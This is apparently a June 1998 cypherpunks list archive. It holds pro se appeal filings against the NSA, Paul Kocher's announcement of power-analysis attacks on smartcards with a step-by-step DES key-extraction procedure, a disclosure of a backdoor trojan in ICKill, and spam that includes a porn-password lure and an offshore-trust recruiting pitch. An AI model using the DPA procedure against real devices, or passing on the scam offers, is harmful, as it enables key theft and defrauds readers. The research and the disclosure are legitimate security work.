  the clerk of the district court within 30 days after the date of entry of the judgment or order appealed from; 
  but if the United States or an officer or agency thereof is a party, the notice of appeal may be filed by any 
  party within 60 days after such entry. If a notice of appeal is mistakenly filed in the court of appeals, the clerk 
  of the court of appeals shall note thereon the date when the clerk received the notice and send it to the clerk 
  of the district court and the notice will be treated as filed in the  district court on the date so noted.

2  Defendant NSA is an agency of the United States.

3  Plaintiff appeals

  NOW, THEREFORE, IT IS ORDERED that Plaintiff's Motion to Amend should be, and is hereby, DENIED. 

seen at http://jya.com/whp052198.htm  to the Tenth Circuit Court of Appeals.


                    Respectfully submitted, 
 
 

	       William H. Payne             	   	     
                    13015 Calle de Sandias NE          	     
                    Albuquerque, NM 87111              	     

                    Pro se litigant
 
 
               CERTIFICATE OF SERVICE 
 
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to Jan E Mitchell, Assistant US Attorney, 
9 Floor, Bank of America Building, 4th and Tijeras, ABQ, NM 87102 
this Tuesday June 9, 1998. 




2






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Kocher <paul@cryptography.com>
Date: Tue, 9 Jun 1998 17:57:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Differential Power Analysis
Message-ID: <199806100055.RAA07091@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain




Information is now available online about three related attacks we 
have developed at Cryptography Research: Simple Power Analysis, 
Differential Power Analysis, and High-Order Differential Power 
Analysis. 

The basic idea of the attacks is that the power consumption of a 
device (such as a smartcard) is statistically correlated to the 
operations it performs.  By monitoring the power usage (or 
electromagnetic radiation, etc.) during cryptographic operations, it 
is possible to obtain information correlated to the keys.  The 
collected data is then analyzed to actually find the keys.  The three 
attacks use increasingly sophisticated analysis methods. 

We have implemented the attack against a large number of smartcards, 
and have found all to be vulnerable.  At this point, we do not 
believe that any smartcards on the market are immune to these 
analysis techniques. 

There is now an initial summary on Differential Power Analysis on our 
web page at http://www.cryptography.com/dpa, and more information 
will be put on the website as it becomes available.  A condensed text 
version is attached below.  At this point, it's fine to talk about 
this with anyone and to forward this message.  

Anything you can do to keep discussion of this technically accurate 
would be much appreciated. 

Regards,
Paul Kocher


---------------------------------------------------------------------

Introduction: Power Variation

Integrated circuits are built out of individual transistors, which 
act as voltage-controlled switches. Current flows across the 
transistor substrate when charge is applied to (or removed from) the 
gate. This current then delivers charge to the gates of other 
transistors, interconnect wires, and other circuit loads. The motion 
of electric charge consumes power and produces electromagnetic 
radiation, both of which are externally detectable. 

Therefore, individual transistors produce externally observable 
electrical behavior. Because microprocessor logic units exhibit 
regular transistor switching patterns, it is possible to easily 
identify macro-characteristics (such as microprocessor activity) by 
the simple monitoring of power consumption. DPA type attacks perform 
more sophisticated interpretations of this data. 



Simple Power Analysis (SPA)

In SPA attacks, an attacker directly observes a system's power 
consumption. The amount of power consumed varies depending on the 
microprocessor instruction performed. Large features such as DES 
rounds, RSA operations, etc. may be identified, since the operations 
performed by the microprocessor vary significantly during different 
parts of these operations. At higher magnification, individual 
instructions can be differentiated. SPA analysis can, for example, be 
used to break RSA implementations by revealing differences between 
multiplication and squaring operations. Similarly, many DES 
implementations have visible differences within permutations and 
shifts (e.g., the PC1 permutation or rotates of the C and D 

registers), and can thus be broken using SPA. While Cryptography 

Research found many smartcards to be vulnerable to SPA analysis, it 
is not particularly difficult to build SPA-resistant devices. 

The figure above [see web site] shows SPA monitoring from a single 
DES operation performed by a typical smartcard. The upper trace shows 
the entire encryption operation, including the initial permutation, 
the 16 DES rounds, and the final permutation. The lower trace is a 
detailed view of the second and third rounds. 



Differential Power Analysis (DPA)

DPA is a much more powerful attack than SPA, and is much more 
difficult to prevent. While SPA attacks use primarily visual 
inspection to identify relevant power fluctuations, DPA attacks use 
statistical analysis and error correction techniques to extract 
information correlated to secret keys. 

Implementation of a DPA attack involves two phases: Data collection 
and data analysis. Data collection for DPA may be performed as 
described previously by sampling a device's power consumption during 
cryptographic operations as a function of time. For DPA, a number of 
cryptographic operations using the target key are observed. 

The following steps provide an example of a DPA attack process for 
technical readers. (More detailed information will follow in the near 
future.) The following explanation presumes a detailed knowledge of 
the DES algorithm. 

  1.  Make power consumption measurements of the last few rounds of 
      1000 DES operations. Each sample set consists of 100000 data 
      points. The data collected can be represented as a two-
      dimensional array S[0...999][0...99999], where the first index 
      is the operation number and the second index is the sample. For 
      this example, the attacker is also assumed to have the 
      encrypted ciphertexts, C[0...999]. 

  2.  The attacker next chooses a key-dependent selection function D. 
      In this case, the selection function would have the form 
      D(Ki,C), where Ki is some key information and C is a 
      ciphertext. For the example, the attacker's goal will be to 
      find the 6 bits of the DES key that are provided as the input 
      to the DES S box 4, so Ki is a 6-bit input. The result of 
      D(Ki,C) would be obtained by performing the DES initial 
      permutation (IP) on C to obtain R and L, performing the E 
      expansion on R, extracting the 6-bit input to S4, XORing with 
      Ki, and using the XOR result as the input to the standard DES 
      S4 lookup operation. A target bit (for example, the most 
      significant bit) of the S result is selected. The P permutation 
      is applied to the bit. The result of the D(Ki,C) function is 
      set to 0 if the single-bit P permutation result and the 
      corresponding bit in L are equal, and otherwise D(Ki,C) yields 
      1. 

  3.  A differential average trace T[0...63][0...99999] is 
      constructed from the data set S using the results of the 
      function D. In particular:  [See web site for formula] 

  4.  The attacker knows that there is one correct value for Ki; 
      other values are incorrect. The attack goal is to identify the 

      correct value. In the trace T[i][0...99999] where i=Ki, 

      D(i,C[k]) for any k will equal the value of the target bit in L 
      of the DES operation before the DES F function result was 
      XORed. When the target device performed the DES operations, 
      this bit value was stored in registers, manipulated in logic 
      units, etc. -- yielding detectable power consumption 
      differences. Thus, for the portions of the trace T[i=Ki] where 
      that bit was present and/or manipulated, the sample set T[i] 
      will show power consumption biases. However, for samples T[i != 
      Ki], the value of D(i,C[k]) will not correspond to any 
      operation actually computed by the target device. As a result, 
      the trace T[i] will not be correlated to anything actually 
      performed, and will average to zero. (Actually, T[i != Ki] will 
      show small fluctuations due to noise and error that is not 
      statistically filtered out, and due to biases resulting from 
      statistical properties of the S tables. However, the largest 
      biases will correspond to the correct value of Ki.) 

  5.  The steps above are then repeated for the remaining S boxes to 
      find the 48 key bits for the last round. The attack can then be 
      repeated to find the previous round's subkey (or the remaining 
      8 bits can be found using a quick search.) 

While the effects of a single transistor switching would be normally 
be impossible to identify from direct observations of a device's 
power consumption, the statistical operations used in DPA are able to 
reliably identify extraordinarily small differences in power 
consumption. 

The figure below [see web site] is a DPA trace from a typical 
smartcard, showing the power consumption differences from selecting 
one input bit to a DES encryption function used as a random number 
generator. (The function of D was chosen to equal the value of 
plaintext bit 5.) The input initial permutation places this bit as 
part of the R register, affecting the first-round F function 
computation and results. Round 2 effects (due to the use of counter 
mode) are also strong. The trace was produced using 1000 
measurements, although the signals would be discernable with far 
fewer. 



High-Order Differential Power Analysis (HO-DPA)

While the DPA techniques described above analyze information across a 
single event between samples, high-order DPA may be used to correlate 
information between multiple cryptographic suboperations. Naive 
attempts to address DPA attacks can introduce or miss vulnerabilities 
to HO-DPA attacks. 

In a high-order DPA attack, signals collected from multiple sources, 
signals collected using different measuring techniques, and signals 
with different temporal offsets are combined during application of 
DPA techniques. Additionally, more general differential functions (D) 
may be applied. More advanced signal processing functions may also be 
applied. The basic HO-DPA processing function is thus a more general 
form of the of the standard DPA function, for example:   [see web 
site for formula]


Today HO-DPA are primarily of interest to system implementers and 
researchers, since no actual systems are known that are vulnerable to 

HO-DPA that are not also vulnerable to DPA. However, DPA 
countermeasures must also address HO-DPA attacks to be effective. 



Solving the Problems 

Cryptography Research has undertaken a substantial development effort 
to understand hardware security issues and their countermeasures. 
Cryptography Research has pending patents directed to the 
technologies and techniques below. 

DPA and related attacks span the traditional engineering levels of 
abstraction. While many previously-known cryptanalytic attacks (such 
as brute force) can be analyzed by studying cryptographic algorithms, 
DPA vulnerabilities result from transistor and circuit electrical 
behaviors which propagate to expose logic gates, microprocessor 
operation, and software implementations. This ultimately compromises 
the cryptography. 

Techniques for addressing DPA and related attacks can be incorporated 
at a variety of levels: 

Transistor: No feasible alternatives to semiconductors are available 
today, but alternate computation technologies (such as pure optical 
computing) may exist in the future. Cryptography Research has 
developed gate-level logic designs that leak substantially less 
information. 

Circuit, Logic, Microprocessor, and Software: In physically large 
systems, well-filtered power supplies and physical shielding can make 
attacks infeasible. For systems with physical or cost constraints, 
Cryptography Research has developed hardware and software techniques 
that include ways of reducing the amount of information leaked, 
introducing noise into measurements, decorrelating internal variables 
from secret parameters, and temporally decorrelating cryptographic 
operations. In applications where attackers do not have physical 
possession of the device performing cryptographic operations, such 
techniques can be effective. However, because externally-monitorable 
characteristics remain fundamentally correlated to cryptographic 
operations, we do not recommend these approaches as a complete 
solution for applications where attackers might gain physical 
possession of devices. 

Software and Algorithms: The most effective solution is to design and 
implementing cryptosystems with the assumption that information will 
leak. Cryptography Research has developed approaches for securing 
existing cryptographic algorithms (including RSA, DES, DSA, Diffie-
Hellman, ElGamal, and Elliptic Curve systems) to make systems remain 
secure even though the underlying circuits may leak information. In 
cases where the physical hardware leaks excessively, the leak 
reduction and masking techniques are also required.



_____________________________________________________________________
Paul Kocher                          President, Cryptography Research
Tel: 415-397-0123 (FAX: -0127)             870 Market St., Suite 1088
E-mail: paul@cryptography.com                 San Francisco, CA 94102


_____________________________________________________________________
Paul Kocher                          President, Cryptography Research
Tel: 415-397-0123 (FAX: -0127)             870 Market St., Suite 1088
E-mail: paul@cryptography.com                 San Francisco, CA 94102




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hello@asianet.co.th
Date: Tue, 9 Jun 1998 13:58:58 -0700 (PDT)
To: (Recipient list suppressed)
Subject: This is fun!!!
Message-ID: <3.0.5.32.19980610010242.007cf180@classic.asianet.co.th>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

Would you like to send someone a letter from Bangkok ?
Well, you can! Put the letter to be remailed in a 
larger envelope with U.S.$3 cash and I will post it
from Bangkok bearing a Bangkok postmark to any country
in the world. If you want the letter to be registered
then enclose U.S.$4 cash. I will pay the postage from 
the enclosed fee. The letter must be lightweight air-
mail only containing not more than 2 sheets of writing
paper. Here's the address...

Snailer
P.O. Box 3,
Bang Or, 10704, 
Bangkok, Thailand.
...

Please register your mail to me. 

A must for secret lovers.

Great for practical jokes and pranksters.

Inform your boss what you think about his ideas.

Tell your ex-wife/husband you're living in Bangkok.

Go on, give it a try it's great fun.

You can put as many envelopes in the larger one
as you like but you must enclose the fee for 
each remailed item. The 10th one goes free!

Mail to be remailed is sent the same day I
receive it unless you specify a date for it to be 
remailed.

No rcords kept and you are completely anonymous
to me so don't put your name and address on any
of the envelopes.

Have fun!!!
***********







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: net138@mail.domain-serv.com
Date: Wed, 10 Jun 1998 03:31:13 -0700 (PDT)
To: Internet_Presence@natmed.com
Subject: Don't Risk Losing That Great Domain Name!
Message-ID: <199806100952.CAA05729@outlook.domain-serv.com>
MIME-Version: 1.0
Content-Type: text/plain


*********************************************************************
Don't Risk Losing That Great Domain Name For 
Your Personal Or Business Use.
*********************************************************************

Register your Domain Name for a one time fee of $35.00.
Planet Net's Domain Registration Services will not only 
register your domain name, but for no monthly charge, 
allow you to use the Planet Net Name Service. When you 
are ready to post your web site or use your domain for 
mail, The decision is up to you; select another website 
hosting company or Host with Planet Net.  We'll even 
waive the set-up fees. Also available are packages with 
custom "under construction" pages and mail services allowing
you to use your new domain for e-mail.

Planet Net, the Internet's premier webmasters resource,
offers high performance Website Hosting and Dedicated 
Servers. Lightning fast 30 MB virtual web hosting packages 
starting at $19.99/Month. Reseller packages with domain hosting
as low as $10 /month All packages include bundles of free 
webmaster tools. 

Sign-up before June 30, 1998 and receive up to 3 Free months 
of web site hosting.

If you would like to check the availability of your domain name or 
learn more about Planet Net type the following address in your web browser.

http://www.serveramerica.com

See You On The Net!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Wed, 10 Jun 1998 03:54:22 -0700 (PDT)
To: Cypherpunks@toad.com (cool dudes)
Subject: Moderator Nazi Update!
Message-ID: <537518a2.357e659f@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks, I may've found a 3rd picture of my "Moderator Nazi".

I have it posted here with the others at -
http://members.aol.com/WhtsAMetaU/ofir.html

I'd like expert opinion from the Cypherpunks (and any FBI agents that may
happen to be lurking the list :-), actually, ESPECIALLY any FBI agents that
may be working the list ;-) ) as to whether you think it's the same person.
Look at it as if he's losing weight over the years.

Write me in private if you wish, and thanks in advance!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Tue, 9 Jun 1998 19:38:49 -0700 (PDT)
To: (Recipient list suppressed)
Subject: Media lies exposed
Message-ID: <1.5.4.32.19980610022819.00b397f4@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


G'day One Nation supporters in NSW

Channel 9 has embarked on a blatant campaign of misinformation against One
Nation over the last two weeks.

The timing in the lead up to the Queensland State election and the resulting
impact on voters cannot be ignored by ANY Australian who believes in freedom
of speech and the democracy that we hold so dear.

Ray Martin exposed:

http://www.gwb.com.au/un.html

60 Minutes discredited:

http://www.gwb.com.au/60.html

Below is a copy of an article that appeared in Perth's Sunday times recently.

GWB



Scott Balson

Judge says no to black state
by Joe Poprzeonzy

A former Chief Justice of the Australian High Court has urged that any
claims by activists for the creation of a separate Aboriginal nation or
independent black states be rejected.

Sir Harry Gibbs said Arnhein Land, parts of central Australia,, north west
WA, islands in the Torres Strait or off northern Australia would be targeted
for Aboriginal independence.

In a keynote address yesterday at a Perth meeting of the influential
conservative group, the Samuel Griffith Society, he said separate laws were
emerging in Australia to cover black and white Australians.

"There is no doubt that any claims by the Aborigional peoples to determine
their own political status, and to assert a right to sovereignty or
independence, must be rejected as contrary to the interests of Australia as
a whole," Sir Harry said.

"Just as any attempt to put the Aboriginal peoples outside the Australian
nation must be firmly opposed, so should any attempt to grant statehood, or
any degree of autonomy to any particular group or Aboriginal people.

"It would obviously be impracticable... to grant sovereign or dominant power
to the Aboriginal people in areas such as country towns in which persons
entirely of European descent were as numerous as the descendants of the
Aboriginal people, many of whom would themselves have had European ancestors.

"Experience elsewhere has shown that associations of States, Federal or
otherwise, do not endure when one state is composed of persons distinctly
different in race, religion or culture from those of another.

"The future existence of Australia would be put at risk if statehood or any
form of autonomy were granted to small communities chosen on the grounds of
race in areas of great strategic importance to this country."

Sir Harry who was Chief Justice of Australia between 1981 and 1987 said some
people were arguing that there was a right of self-determination within
countries. He said groups were working within the UN for the development of
such doctrines.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 10 Jun 1998 13:54:36 -0700 (PDT)
To: jy@jya.com
Subject: Second Notice of Appeal FILED
Message-ID: <357EF1F0.6569@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 6/10/98 2:34 PM

John Young 

The second attached NOTICE OF APPEAL was stamped

              FILED
	UNITED STATES DISTRICT COURT
	DISTRICT OF NEW MEXICO
	
	98 JUN 10 AM 9:52

	Robert M. March
	Clerk, ALBUQUERQUE

I put stamped copies of both in the mail to you.

The government only MAYBE understands FORMAL actions.

Informal actions, like letters etc, go into the waste paper basket.

Even formal actions such as the FOIA, PA, lawsuit, and criminal
complaint
affidavit the government will try to BLACK HOLE.

While, naturally, we would like to settle this unfortunate matter so
that we
can all get on to more constructive pursuits, it appears that we will be
doing
a FORMAL ACTION at least TWICE through the Tenth Circuit court of 
appeals.

Later
bill


                    UNITED STATES DISTRICT COURT 
                 FOR THE DISTRICT OF NEW MEXICO 
 
 
William H. Payne        	   	    		              ) 
Arthur R. Morales                           			) 
                                            				) 
                Plaintiffs,                 			              ) 
                                            				) 
v                                           				)	CIV NO 97 0266  
							)	SC/DJS 
			                    			) 
Lieutenant General Kenneth A. Minihan, USAF 	              ) 
Director, National Security Agency	    		              ) 
National Security Agency		    		              ) 
                                            				) 
                Defendant                   			              ) 
 
 
NOTICE OF APPEAL  Santiago E. Campos MEMORANDUM OPINION AND ORDER FILED 98 APR 30  
AM 11:45 
 
1  COMES NOW plaintiffs Payne  and Morales [Plaintiffs] to exercise their rights under the 
 
Federal Rules of Appellate Procedure    http://www.ca5.uscourts.gov/docs/frap-iop.htm 
 
FRAP 4. APPEAL AS OF RIGHT--WHEN TAKEN    http://www.ca5.uscourts.gov/docs/frap-iop.htm#4 
 
  a) Appeal in a Civil Case. 
 
  (1) Except as provided in paragraph (a)(4) of this Rule, in a civil case in which an appeal is permitted by law    
  as of right from a district court to a court of appeals the notice of appeal required by Rule 3 must be filed with  
  the clerk of the district court within 30 days after the date of entry of the judgment or order appealed from;  
  but if the United States or an officer or agency thereof is a party, the notice of appeal may be filed by any  
  party within 60 days after such entry. If a notice of appeal is mistakenly filed in the court of appeals, the clerk  
  of the court of appeals shall note thereon the date when the clerk received the notice and send it to the clerk  
  of the district court and the notice will be treated as filed in the  district court on the date so noted. 
 
2  Defendant Minihan is officer of the United States. 
 
3  Plaintiffs appeal  
 
A   NOW, THEREFORE, IT IS ORDERED that sua sponte, Defendant is DEEMED by the Court to be the    
      NSA, and not Lt. Gen. Kenneth A. Minihan. Future captions for this case should reflect this change. 
 
B   IT IS FURTHER ORDERED that Defendant's Motion to Dismiss Plaintiff Morales is GRANTED. 
 
C   IT IS FURTHER ORDERED that Plaintiff's Motion for Summary Judgment Based on Evidence from   
     Admissions is DENIED as MOOT. 
 
seen at   http://jya.com/whp043098.htm   to the Tenth Circuit Court of Appeals. 
 
                    Respectfully submitted,  
  
  
 
	      William H. Payne             	   	      
                    13015 Calle de Sandias NE          	      
                    Albuquerque, NM 87111              	      
  
 			 
                     
                    Arthur R. Morales                             
                    1024 Los Arboles NW                          
                    Albuquerque, NM 87107                         
  
                    Pro se litigants  
  
  
               CERTIFICATE OF SERVICE  
  
I HEREBY CERTIFY that a copy of the foregoing memorandum
was mailed to Lieutenant General Kenneth A. Minihan, USAF, 
Director,  National Security Agency, National Security Agency, 
9800 Savage Road, Fort George G. Meade, MD 20755-6000 
and hand delivered to Jan E Mitchell, Assistant US Attorney, 
9 Floor, Bank of America Building, 3rd and Tijeras, ABQ, NM 87102 
this Wednesday June 10, 1998. 




2






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 2ncesca9@net.kitel.co.kr
Date: Wed, 10 Jun 1998 09:51:16 -0700 (PDT)
To: 2ncesca9@net.kitel.co.kr
Subject: hello hello !!
Message-ID: <199806102819IAA55011@abcd456.246.250.46>
MIME-Version: 1.0
Content-Type: text/plain




!!!!! YES YOUR XXXX PASSWORD AWAITS YOU !!!!!!
 
 > To get your password...

Just:
<a href="http://204.71.176.71/members4/rose541/index.html">
Click Here</a>





................











..................//




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 10 Jun 1998 14:00:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: backdoor trojan in ICKill
Message-ID: <199806102100.XAA27780@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


----Forwarded text--------------------------------------------------
Subject: backdoor trojan in ICKill
   Date: Sun, 7 Jun 1998 19:44:28 -0400
   From: Bachrach <bachrach@netreach.net>
     To: BUGTRAQ@NETSPACE.ORG

    First off, I'm not 100% sure if this is the apropriate forum for
this
since it's not really a weakness, but rather a programmer who is putting
backdoors
into some programs. Then again technically that's an exploits... Oh I
don't know. If this is the wrong place then I apologize profusely for
the
waste of bandwidth and plead ignorance, but here goes:
    Well, chances are none of you guys have ever used this program, or
even
heard of it, but there are alot (35,000) of people who have. I
originally
downloaded it becasue I've been researching a lot of the weaknesses in
the
ICQ protocol, (which has become easier as time has gone on. :)) Anyway,
after
you run it, (ICKill), it creates a file in the directory called 1.exe
that
acts as a
fake explorer. 1.exe accesses your regedit database, and copies itself
to
windows/system. It changes the regedit so that the fake one will run on
startup. It acts mostly the same as the normal explorer with one very
crucial execption. It contacts a host (I still can't figure out which
one),
and executes the commands that are embedded within a text file on the
computer. Anyone see it yet? Backdoor city. I contacted the author (who
left
his e-mail address in the readme), and he's the one who explained th
backdoor thing. He also told me a few other things that made me write up
to
this group.
    He said that he had gotten almost 35,000 different people's systems
calling up his computer at one point; essentuially he has backdoors to
35,000 systems accross the globe. When I asked him why he would go
through
all the trouble to do this he gave me two reasons:
1. IF (and he emphasized the if) he was a hacker he could use a couple
of
other people's computers as hops when hacking into a system. Kind of
nasty
for the sysadmin trying to trace a breaking huh?
2. To quote him "And the backdoors can auto-uptade themselves.. so
Imagine I
can code a virus like backdoor... Whoaaa! This will be like THAT
internet
worm.."
3. He also said "Imagine also.. 35,000 backdoored (yeah, I reached this
number)
connections pinging or SYN flooding some server.."

Well if anyone out there is using or has ever used ICKill then get rid
of
it. I have actually set up a page on this to both inform people and
explain
how to get rid of all traces of the program that I currently am able to
at
http://members.tripod.com/~hakz/ICQ/index.html That site also has all of
the
letters I wrote to him and he wrote to me if you want to see the entire
things. It's also got some other info I couldn't fit into this message,
including all of the mistakes the author made (guess he needed better
beta
testing). My
last question is this: if one person has backdoors into thousands of
computer systems, doesn't that pose some sort of risk to the interent
community as a whole? There's one person who's been saying that I should
notify the FBI about this. As you can see  decided to start here first.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zane Lewkowicz <zooko@xs4all.nl>
Date: Wed, 10 Jun 1998 15:23:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [SPAM]  No really.  It _is_ spam.  It's spam, i tell you.  You've been warned!
Message-ID: <199806102223.AAA20590@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


From: incognito@incognito.com
Date: Thu, 11 Jun 1998
To: (Recipient list suppressed)
Subject: This is fun!!!

Hi,

Would you like to send someone a letter from Bangkok?
Well, you can! Put the letter to be remailed in a 
larger envelope with US$3 cash and I will post it from 
Bangkok bearing a Bangkok postmark to any country in 
the world. If you want the letter to go registered then 
enclose US$4 cash. I will pay the postage from the 
enclosed fee. The letter must be lightweight air-mail 
only containing not more than 2 sheets of writing paper. 

Here's the address...

Incognito
P.O. Box 3,
10704, Bang Orr, 
Bangkok, Thailand.
...

Please register your mail to me.
- --------------------------------

A must for secret lovers.

Great for practical jokes and pranksters.

Inform your boss what you think about her/his ideas.

Tell your ex-wife/husband you're living in Bangkok.

Go on, give it a try it's great fun.

You can put as many envelopes in the larger one
as you like but you must enclose the fee for 
each remailed item. The 10th letter goes free!

Here's another way...

1. Send US$10 cash and I'll send you three picture
   postcards of various places in Thailand. I send 
   them to you and you write them out and post back
   to me for remailing. 

Or...

2. Enclose a slip of paper with the US$10 giving 
   details of names and addresses and messages to 
   go on the three postcards.

Mail to be remailed is sent the same day it is
received unless you specify a date for it to be 
remailed.

No records kept and you are completely unknown
to me so don't put your name and address on any
of the envelopes.

Please send a copy of this email to your friends. 

Have fun!!!
***********




------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Wed, 10 Jun 1998 23:53:31 -0700 (PDT)
To: Cypherpunks@toad.com
Subject: Nobody Report
Message-ID: <3b5db7e4.357f7ec6@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


So 'Nobody' (Tim May) has joined FreeGroup.  Of course, shortly after that he
revealed himself (in multiple fuckups) and he tried to cause a big ruckus, but
that's no big deal.  Actually, the alias that he joined the group under seems
to be pretty nice guy (when he's not abusing the addressing. ;-) )

So, all's well that ends well, or is it, Tim?  [BIG GRIN!]

Stan,
FreeGroup - "Just Say It!"
http://members.aol.com/WhtsAMetaU/FreeGroup.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: properties@hotmail.com
Date: Thu, 11 Jun 1998 06:01:58 -0700 (PDT)
To: SUCCESS@NOWHERE.COM
Subject: BUSINESS OPPORTUNITY
Message-ID: <306724452//JHGREW101>
MIME-Version: 1.0
Content-Type: text/plain


IF YOU ARE NOT MAKING IN THE HIGH  (6) FIGURES, REPLY WITH YOUR FAX NUMBER . OFFSHORE TRUST HIRING AGENTS TO MARKET GUARNTEED  HIGH INTEREST TO THE CLIENT AND AGENTS.
WE HAVE AGENTS MAKING IN EXCESS $1,000,000.00 PER YEAR NOT WORKING
FULL TIME.   YOU CAN HIRE OTHER AGENTS ALONE AND EARN IN THE (6)
FIGURES BY JUST RECEIVING THE 4%  OVERRIDE ON THE RECRUITED AGENTS
BUSINESS. YOU ARE 100% PROTECTED BY HAVING THE RECRUITED AGENT
SIGN THE APPLICATION AND YOU ALSO SIGN IT WITH HIM AS THE RECRUITER
AND YOU AS THE RECRUITER SEND IN THE APPLICATION     .ANY ONE OUTSIDE
OF THE USA PLEASE SEND ALONG WITH YOUR FAX NUMBER, YOUR COUNTRY
CODE.  THANKS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 11 Jun 1998 12:16:50 -0700 (PDT)
To: cypherpunks
Subject: President's Export Council Subcommittee on Encryption: June 22
Message-ID: <199806111916.MAA25195@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


[It might be interesting for DC-area cypherpunks to visit and see
what they're doing.  This council was appointed to advise the
Commerce Dept and the President about export of encryption.  --gnu]

President's Export Council Subcommittee on Encryption Meeting

June 22, 1998
Ronald Reagan Building, 1300 Pennsylvania Ave. NW, Washington DC
Conference Room Hemisphere A

Agenda

9.00       Opening Remarks
		   Chair of the Subcommittee
	   Public Comments

9.30       BXA Updates
		    William Reinsch

10.00      Legislative Panel Briefing
		   unpublished as to who will be doing the briefing

11.00      Closed Session

4.00       Open to public  Rm 4832
	   Commerce Department Briefing by each of the 3 Working       
		   Groups on the topic

4.45       End




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 11 Jun 1998 12:33:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: AF Docs on Comsec and Intel
Message-ID: <199806111933.PAA05189@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The USAF offers hundreds of documents at its Electronic
Publications site:

   http://afpubs.hq.af.mil/elec-products/pubs-pages/

We've mirrored listings for dozens of docs in two categories:

Communications and Information:

   http://www.jya.com/af-33-pubs.htm

Intelligence:

   http://www.jya.com/af-14-pubs.htm

And, in case there's difficulty accessing, we've mirrored:

"Instruction on the Operation of the STU-III":

   http://www.jya.com/33020900.pdf  (534K PDF)

"Cryptographic Access":

   http://www.jya.com/33021000.pdf  (129K PDF)

"Emission Security":

   http://www.jya.com/33020300.pdf  (296K PDF)

"Controlled Access Program":

   http://www.jya.com/33022900.pdf  (170K PDF)

"Sources of Intelligence":

   http://www.jya.com/af-intel.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Thu, 11 Jun 1998 08:22:48 -0700 (PDT)
To: ukcrypto@maillist.ox.ac.uk
Subject: Crypto Law Survey updated
Message-ID: <920DAEE2DA7@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


I have just updated my survey of existing and envisaged cryptography
laws and regulations. See the Crypto Law Survey at
http://cwis.kub.nl/~frw/people/koops/lawsurvy.htm

This update includes:
-update on Wassenaar (to be revised), EU (proposal for new
     dual-use regulation; Copenhagen hearing; ETSI rejects RH;
     law-enforcement policy paper), Birma (domestic regulation),
     Brazil (no regulation plans), Germany (no regulation before
     elections), Kazakhstan (domestic controls), Malaysia (CA's must
     decrypt during search), Pakistan (regulation on sale and use),
     Spain (export), Sweden (export), US (Karn; Junger; new version
     Kerrey-McCain; Gore letter) 

- URLs added to EU (conditional access
     regulation), US (BXA Annual Report; Junger page) 

I have also started a mailing list to announce updates, to 
which you can subscribe by sending a message to 
<E.J.Koops@kub.nl> with subject "subscribe CLS-update".

Kind regards,
Bert-Jaap

---------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law, Administration and      facs    +31 13 466 8149
Informatization, Tilburg University     e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://cwis.kub.nl/~frw/people/koops/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 11 Jun 1998 21:28:56 -0700 (PDT)
To: Bachrach <cypherpunks@toad.com
Subject: FWD: backdoor trojan in ICKill
In-Reply-To: <199806102100.XAA27780@basement.replay.com>
Message-ID: <3.0.5.32.19980611174656.008163d0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 6/10/98 +0200, a remailer user forwarded
a message From: Bachrach <bachrach@netreach.net>
about a major security backdoor in ICKill, a utility that
apparently augments or hangs around ICQ - it's a little-documented
feature designed into the system rather than a bug or unexpected behaviour.
More information is at
> http://members.tripod.com/~hakz/ICQ/index.html 
...
>My last question is this: if one person has backdoors into thousands of
>computer systems, doesn't that pose some sort of risk to the interent
>community as a whole? There's one person who's been saying that I should
>notify the FBI about this. As you can see  decided to start here first.

Don't tell the FBI - they'll just want to use it themselves.  :-!

Is there some way to locate and reach ICKill users directly?
